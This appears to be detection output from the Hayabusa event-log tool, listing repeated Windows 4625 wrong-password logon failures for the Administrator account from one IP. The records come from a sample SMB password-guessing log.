+2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
